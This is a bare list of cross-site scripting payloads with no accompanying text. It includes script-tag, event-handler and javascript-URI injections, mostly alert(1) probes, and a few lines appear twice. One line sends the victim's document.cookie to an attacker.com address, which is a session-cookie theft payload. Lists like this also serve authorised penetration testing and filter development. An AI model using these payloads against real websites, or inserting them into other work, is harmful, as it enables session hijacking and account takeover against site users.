"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<marquee onstart=alert(1)>
<script>alert('XSS')</script>
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
"><svg/onload=alert(1)>
"><body onload=alert('XSS')>
"><iframe src="javascript:alert('XSS')"></iframe>
<script>document.location='http://attacker.com/?cookie='+document.cookie</script>
"><input autofocus onfocus=alert(1)>
"><math><mi//xlink:href="data:x,<script>alert(1)</script>"></math>
